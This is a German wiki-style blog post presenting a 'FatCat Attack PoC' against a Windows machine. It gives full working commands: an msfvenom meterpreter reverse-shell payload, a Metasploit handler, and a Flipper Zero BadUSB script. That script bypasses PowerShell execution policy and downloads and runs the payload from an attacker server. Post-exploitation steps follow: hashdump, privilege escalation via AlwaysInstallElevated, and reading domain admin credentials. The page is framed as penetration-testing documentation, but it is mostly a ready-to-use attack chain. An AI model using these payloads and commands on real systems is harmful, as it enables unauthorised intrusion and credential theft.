{{tag>deutsch blog it-security pentest}}

====== FatCat Attack PoC ======

In diesem PoC nutzen wir mehrere Sicherheitslücken, um uns volle Rechte über ein System zu sichern.
<code text>
 _____     _    ____      _
|  ___|_ _| |_ / ___|__ _| |_
| |_ / _` | __| |   / _` | __|
|  _| (_| | |_| |__| (_| | |_
|_|  \__,_|\__|\____\__,_|\__|
Attack PoC
</code>
\\
\\
===== Beschreibung =====

{{page>vorlagen:attention}}

Zielsetzung soll sein, relevante SAM Daten aus der Registry abzuziehen. Hierzu wird der Flipper als BadUSB Device benutzt. Die PowerShell Execution Policy soll umgangen werden und mit einer Privilege Escalation die erforderlichen Rechte gesichert werden. Folgende Daten sollen exfiltriert werden:

^ User ^ Passwort ^ Hash ^
| Host \ User |  |  |
| Host \ Admin |  |  |
| Domain \ Admin |  |  |
\\
\\
===== Ablauf =====

  - AV deaktivieren
  - Payload erstellen
  - handler starten
  - BadUSB Angriff
  - RemoteShell nutzen zum Erkunden
  - Exploit suchen
  - Exploit anwenden
  - Creds einsammeln
\\
\\
===== Dokumentation =====

^ Attack Chain Step ^ Attack Technique ^ Attack Tool ^
| @#D0FA58:**Weaponization** | Exploit, Payload | msfvenom((https://github.com/ksanchezcld/Hacking_Cheat_Sheet/blob/master/msfvenom)) |
| @#FACC2E:**Delivery** | Physical access, Injection | Flipper((https://flipperzero.one/)), BadUSB((https://grantonline.medium.com/flipper-zero-badusb-getting-started-with-duckyscript-f212fcdd5dec)) |
| ::: | Bypass | PowerShell Restrictions((https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/)) |
| @#2E9AFE:**Exploitation** | Reverse Shell | Metasploit((https://www.hackers-arise.com/post/2017/07/31/metasploit-basics-part-9-using-msfvenom-to-create-custom-payloads)) |
| ::: | Enumeration | **Enumerate System Info** JAWS((https://github.com/411Hall/JAWS)), SessionGopher((https://github.com/Arvanaghi/SessionGopher)), weak Service Permissions((https://fuzzysecurity.com/tutorials/16.html)), Primary Access Token Manipulation((https://www.ired.team/offensive-security/privilege-escalation/t1134-access-token-manipulation)), Unquoted Service Path ((https://www.ired.team/offensive-security/privilege-escalation/unquoted-service-paths)), PassTheHash ((https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/README.md)) ((https://www.ired.team/offensive-security/privilege-escalation/pass-the-hash-privilege-escalation-with-invoke-wmiexec)), BetterSafetyKatz (Builds local, obfuscating not complete), Search for local Exploits((https://null-byte.wonderhowto.com/how-to/get-root-with-metasploits-local-exploit-suggester-0199463/)) |
| ::: | Privilege Escalation((https://github.com/frizb/Windows-Privilege-Escalation)) | AlwaysInstallElevated ((https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated)) |
| @#58D3F7:**Actions on Objectives** | Exfiltration | Exfiltrate Data |
\\
\\
===== Vorbereitungen und Angriff =====

==== Metasploit Payload ====

  * Metasploit starten
  * cmd öffnen

<code dos>cmd</code>

  * Payload generieren

<code dos>msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.2.77 LPORT=50666 -e x86/shikata_ga_nai -i 5 -f exe > msfpayload.exe</code>

  * Shell verlassen

<code dos>exit</code>

  * Payload auf einem Webserver hinterlegen
\\
[{{:it-security:blog:002-fc-msfvenom.png?400|Payload generieren}}]
\\
==== Metasploit Handler ====

  * Multi Handler Server starten

<code ruby>
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.77
set LPORT 50666
exploit
</code>
\\
[{{:it-security:blog:001-fc-handler.png?400|Metasploit Handler konfigurieren und starten}}]
\\
==== Zugriff auf das Zielsystem ====

  * Mit dem Flipper, wird folgendes Script auf dem Zielsystem ausgeführt

<code dos>
WINDOWS r
DELAY 2000
STRING powershell.exe
DELAY 3000
ENTER
DELAY 5000
STRING Set-ExecutionPolicy Bypass -Scope Process -force
DELAY 3000
ENTER
DELAY 3000
STRING irm https://<DEIN-COOLER-WEBSERVER>/msfpayload.exe -OutFile msfpayload.exe
DELAY 3000
ENTER
DELAY 5000
STRING Start-Process msfpayload.exe
DELAY 3000
ENTER
DELAY 3000
STRING exit
DELAY 1500
ENTER
</code>
\\
[{{:it-security:blog:003-fc-flipperattack.png?400|Flipper Attacke wird ausgeführt}}]
\\
==== Verbindung steht - Metasploit macht's ====

<code dos>
getsystem
hashdump
ls
getwd
cd c:
cd Glob_Share
ls
background
use post/multi/recon/local_exploit_suggester
sessions
set session 1
run
use exploit/windows/local/always_install_elevated
set session 1
exploit
cd glob_share
type Domain-Admin-Creds.txt
hashdump
sessions -i 1
</code>

[{{:it-security:blog:004-fc-session.png?400|Meterpreter Session hergestellt}}]
[{{:it-security:blog:005-fc-exploitsearch.png?400|automatisierte Exploit Suche für Privilege Escalation}}]
[{{:it-security:blog:006-fc-privesc.png?400|Privilege Escalation erfolgreich}}]
[{{:it-security:blog:007-fc-creds.png?400|Hier sind unsere gesuchten Credentials}}]

~~DISCUSSION~~